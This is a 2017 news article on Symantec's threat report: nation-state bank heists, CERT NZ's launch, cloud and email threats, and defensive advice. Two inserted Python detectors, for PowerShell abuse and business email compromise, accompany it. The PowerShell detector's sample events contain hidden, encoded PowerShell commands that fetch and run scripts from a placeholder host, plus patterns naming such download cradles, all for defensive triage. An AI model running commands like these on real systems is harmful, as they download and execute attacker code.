by Divina Paredes

Nation states behind some of the largest heists carried out virtually over the past year

Apr 26, 2017


Nation states, as well as organised criminals, are behind some of the largest heists that were carried out virtually over the past year, says Symantec.

The heists have netted billions of dollars for these groups, which Symantec believes will be used to help fund other covert and subversive activities.

While some of these attacks are the work of organised criminal gangs, for the first time nation states appear to be involved as well, says Symantec in its latest Internet Security Threat Report (ISTR).

Symantec says it has uncovered evidence linking North Korea to attacks on banks in Bangladesh, Vietnam, Ecuador and Poland.

“This was an incredibly audacious hack as well as the first time we observed strong indications of nation state involvement in financial cybercrime,” says Kevin Haley, director, Symantec Security Response.

“While their sights were set even higher, the attackers stole at least US$94 million.”

He says cybercriminals revealed new levels of ambition in 2016 – a year marked by extraordinary attacks, including multi-million dollar virtual bank heists and overt attempts to disrupt the US electoral process by state-sponsored groups.

“New sophistication and innovation are the nature of the threat landscape, but this year Symantec has identified seismic shifts in motivation and focus,” adds Haley.

“The world saw specific nation states double down on political manipulation and straight sabotage. Meanwhile, cybercriminals caused unprecedented levels of disruption by focusing their exploits on relatively simple IT tools and cloud services.”

Symantec says cybercriminals are executing politically devastating attacks in a move to undermine a new class of targets.

It says the cyberattacks against the US Democratic Party and the subsequent leak of stolen information reflect a trend toward criminals employing highly publicised, overt campaigns designed to destabilise and disrupt targeted organisations and countries.

While attacks involving sabotage have traditionally been quite rare, the perceived success of several campaigns – including the US election and Shamoon – points to a growing trend of criminals attempting to influence politics and sow discord in other countries, says Symantec.

NZ launches CERT

The New Zealand government, meanwhile, has launched CERT NZ, a cybersecurity unit to help Kiwis respond to online threats.

New Zealand is joining a large and sophisticated global network of CERTs, in which it will play an important role developing and executing best practice processes and systems to prevent and respond to cybersecurity incidents.


“Access to international best practice and threat information will increase our ability to protect our information and systems against cyberthreats. It will also enhance New Zealand’s reputation as a trusted business and security partner, which has benefits to our economy and our many businesses that rely on international trade,” says Communications Minister Simon Bridges.


CERT NZ was announced as part of Budget 2016, receiving $22.2 million of funding over four years. It will serve as the first place for New Zealanders to report a cyber incident.

The unit will sit at the centre of New Zealand’s cybersecurity architecture to deliver on five core functions of incident reporting, response coordination, readiness support, vulnerability identification and threat identification.

“We want to build a confident, secure and engaged online New Zealand as the ever-evolving digital world increasingly impacts on almost all aspects of our lives,” says Bridges.

“CERT NZ will make it easier for people at work and at home to understand, prevent and recover from cybersecurity incidents.”


Cloud: The next frontier for cybercrime

Meanwhile, Symantec notes a growing reliance on cloud services has left organisations open to attacks.

Tens of thousands of cloud databases from a single provider were hijacked and held for ransom in 2016 after users left outdated databases open on the internet without authentication turned on.

Cloud security continues to challenge CIOs. According to Symantec data, CIOs have lost track of how many cloud apps are used inside their organisations.

When asked, most assume their organisations use up to 40 cloud apps when in reality the number nears 1000.

This disparity can lead to a lack of policies and procedures for how employees access cloud services, which in turn makes cloud apps riskier. The cracks in the cloud are beginning to show.

Symantec predicts that unless CIOs get a firmer grip on the cloud apps used inside their organisations, they will see a shift in how threats enter their environment.

Email as the weapon of choice

Symantec says that in 2016 cybercriminals used PowerShell, a common scripting language installed on PCs, and Microsoft Office files as weapons.

While system administrators may use these common IT tools for daily management tasks, cybercriminals increasingly used this combination for their campaigns as it leaves a lighter footprint and offers the ability to hide in plain sight.

Due to the widespread use of PowerShell by attackers, 95 per cent of PowerShell files seen by Symantec in the wild were malicious.
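The combination described above (an Office document launching PowerShell with a hidden window and an encoded command) is exactly what endpoint process-creation logs let a defender catch. The following is an added illustration, not code from the article or from Symantec: it scores constructed process-creation events (modelled on the parent image, image and command line fields that Sysmon or Windows event logs provide) against a handful of traits that administrators rarely combine but attackers usually do, and it decodes the base64 `-EncodedCommand` layer so the real command can be scanned too. The pattern names, the scoring weights, the threshold and every sample event and hostname are assumptions made for this example.

```python
from __future__ import annotations

import base64
import re
from dataclasses import dataclass, field
from typing import Optional

# Office executables that should almost never be the parent of a PowerShell process.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Command-line traits attackers commonly combine; each hit counts as one reason.
# The names and patterns are assumptions for this example, not a vendor rule set.
FLAG_PATTERNS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-no(?:p|profile)\b", re.I),
    "bypass_policy": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{20,})", re.I),
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|Invoke-Expression", re.I),
}


def encode_command(command: str) -> str:
    """Produce the -EncodedCommand form (UTF-16LE, base64). Used here only to build sample input."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


def decode_encoded_command(token: str) -> Optional[str]:
    """Reverse that encoding so the real command can be inspected; None if the token is not valid."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


@dataclass
class Finding:
    host: str
    score: int
    reasons: list[str] = field(default_factory=list)
    decoded: Optional[str] = None


def analyse_event(event: dict) -> Finding:
    """Score one process-creation event: every independent suspicious trait adds one point."""
    reasons: list[str] = []
    decoded = None
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    if parent in OFFICE_PARENTS:
        reasons.append(f"spawned_by_office:{parent}")
    cmd = event["cmdline"]
    for name, pattern in FLAG_PATTERNS.items():
        match = pattern.search(cmd)
        if not match:
            continue
        reasons.append(name)
        if name == "encoded_command":
            # The base64 layer defeats naive string matching on the command line,
            # so decode it and scan the plaintext for download behaviour as well.
            decoded = decode_encoded_command(match.group(1))
            if decoded and FLAG_PATTERNS["download_cradle"].search(decoded):
                reasons.append("download_cradle_in_decoded_command")
    return Finding(event["host"], len(reasons), reasons, decoded)


def triage(events, threshold: int = 2) -> list[Finding]:
    """Return the findings at or above the threshold, most suspicious first."""
    findings = [analyse_event(e) for e in events]
    return sorted((f for f in findings if f.score >= threshold), key=lambda f: -f.score)


# Constructed sample events (hostnames, paths and commands invented for this example).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"host": "ws01", "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": r"powershell.exe -File C:\scripts\nightly-backup.ps1"},
    {"host": "ws02", "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "image": PS,
     "cmdline": "powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand "
                + encode_command("(New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')")},
    {"host": "ws03", "parent": r"C:\Windows\System32\cmd.exe", "image": PS,
     "cmdline": 'powershell -nop -w hidden -c "Invoke-WebRequest -Uri http://example.invalid/p.ps1 -OutFile C:\\Users\\Public\\p.ps1"'},
    {"host": "ws04", "parent": r"C:\Windows\System32\cmd.exe", "image": PS,
     "cmdline": "powershell.exe -NoProfile -Command Get-Service -Name Spooler"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding.host, finding.score, ", ".join(finding.reasons))
        if finding.decoded:
            print("  decoded:", finding.decoded)
```

The admin's `-NoProfile -Command Get-Service` on ws04 scores one point and stays below the threshold, while the Word-spawned, hidden, encoded invocation on ws02 accumulates six; the threshold rather than any single trait is what separates the two, which is why a rule keyed on one flag alone tends to drown in false positives.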

The use of email as an infection point also rose, becoming a weapon of choice for cybercriminals and a dangerous threat to users.

Symantec found one in 131 emails contained a malicious link or attachment – the highest rate in five years.

Furthermore, business email compromise (BEC) scams, which rely on little more than carefully composed spear-phishing emails, scammed more than three billion dollars from businesses over the last three years, targeting over 400 businesses every day.
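Because a BEC email carries no malware, the signals a mail gateway can use are in the headers and wording: an executive's name on an external sender address, a Reply-To that quietly redirects the conversation, a domain that is one character away from the company's own, and urgent payment language. The following is an added illustration and not code from the article or from Symantec: it applies those four checks to three constructed messages using only the Python standard library. The company domain `examplecorp.test`, the executive list, the keyword lists and the edit-distance cut-off of two are all assumptions for this example.

```python
from __future__ import annotations

import re
from email import message_from_string
from email.message import Message
from email.utils import parseaddr

# Assumed organisation details for this example.
INTERNAL_DOMAIN = "examplecorp.test"
EXECUTIVES = {"jane doe", "john smith"}

URGENCY = re.compile(r"\b(urgent|immediately|asap|today|right away)\b", re.I)
PAYMENT = re.compile(r"\b(wire|transfer|invoice|bank details|payment|gift cards?)\b", re.I)


def levenshtein(a: str, b: str) -> int:
    """Edit distance; a lookalike domain is usually within one or two edits of the real one."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def domain_of(addr: str) -> str:
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def impersonates_executive(display_name: str) -> bool:
    # Normalise "Jane Doe (CFO)" to "jane doe cfo" before comparing.
    normalised = " ".join(re.sub(r"[^a-z]+", " ", display_name.lower()).split())
    return any(name in normalised for name in EXECUTIVES)


def is_lookalike(domain: str) -> bool:
    return bool(domain) and domain != INTERNAL_DOMAIN and levenshtein(domain, INTERNAL_DOMAIN) <= 2


def body_text(msg: Message) -> str:
    if msg.is_multipart():
        parts = [p.get_payload(decode=True) or b"" for p in msg.walk()
                 if p.get_content_type() == "text/plain"]
        return "\n".join(p.decode(errors="replace") for p in parts)
    payload = msg.get_payload(decode=True)
    return payload.decode(errors="replace") if payload else ""


def analyse_message(raw: str) -> list[str]:
    """Return the BEC indicators found in one RFC 822 message (empty list if none)."""
    msg = message_from_string(raw)
    from_name, from_addr = parseaddr(msg.get("From", ""))
    _, reply_addr = parseaddr(msg.get("Reply-To", ""))
    from_dom, reply_dom = domain_of(from_addr), domain_of(reply_addr)
    flags: list[str] = []
    if impersonates_executive(from_name) and from_dom != INTERNAL_DOMAIN:
        flags.append("executive_name_external_sender")
    if reply_dom and reply_dom != from_dom:
        flags.append("reply_to_domain_mismatch")
    for dom in dict.fromkeys((from_dom, reply_dom)):
        if is_lookalike(dom):
            flags.append(f"lookalike_domain:{dom}")
    text = msg.get("Subject", "") + "\n" + body_text(msg)
    if URGENCY.search(text) and PAYMENT.search(text):
        flags.append("urgent_payment_language")
    return flags


# Constructed sample messages (names, addresses and domains invented for this example).
MSG_LEGIT = """From: "Jane Doe (CFO)" <jane.doe@examplecorp.test>
To: bob@examplecorp.test
Subject: Q3 board pack

Bob, the draft is in the shared folder. Thanks.
"""

MSG_BEC = """From: "Jane Doe" <jane.doe.ceo@webmail.test>
Reply-To: <jane.doe@exarnplecorp.test>
To: bob@examplecorp.test
Subject: Urgent wire transfer before close of business today

Bob, I am in meetings all day. Please process the transfer to the vendor below immediately and reply here.
"""

MSG_VENDOR = """From: "Accounts Payable" <billing@examplec0rp.test>
To: bob@examplecorp.test
Subject: Updated bank details for invoice 1042

Please use the new account for all future payments.
"""

if __name__ == "__main__":
    for label, raw in (("legit", MSG_LEGIT), ("bec", MSG_BEC), ("vendor", MSG_VENDOR)):
        print(label, analyse_message(raw) or "no indicators")
```

The vendor message trips only the lookalike check, which is the realistic case: a single strong header indicator is often all a payment-diversion email gives away, so it should be enough on its own to hold the message for review rather than waiting for the urgency wording that the executive-impersonation message also carries.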

Ransomware continued to escalate as a global problem and a lucrative business for criminals.

Symantec says it has identified over 100 new malware families released into the wild, more than triple the amount seen previously, and a 36 per cent increase in ransomware attacks worldwide.


How to prepare for the worst

The Symantec report lists ways organisations can stay safe from cybercriminals.

Don’t get caught flat-footed: Use advanced threat intelligence solutions to help you find indicators of compromise and respond faster to incidents.

Prepare for the worst: Incident management ensures your security framework is optimised, measurable and repeatable, and that lessons learned improve your security posture. Consider adding a retainer with a third-party expert to help manage crises.

Implement a multi-layered defence: Adopt a defence strategy that addresses attack vectors at the gateway, mail server and endpoint. This should also include two-factor authentication, intrusion detection and prevention systems (IDS/IPS), website vulnerability and malware protection, and web security gateway solutions throughout the network.

Provide ongoing training about malicious email: Educate employees on the dangers posed by spear-phishing emails and other malicious email attacks, including where to internally report such attempts.

Monitor your resources: Make sure to monitor your resources and networks for abnormal and suspicious behaviour, and correlate it with threat intelligence from experts.
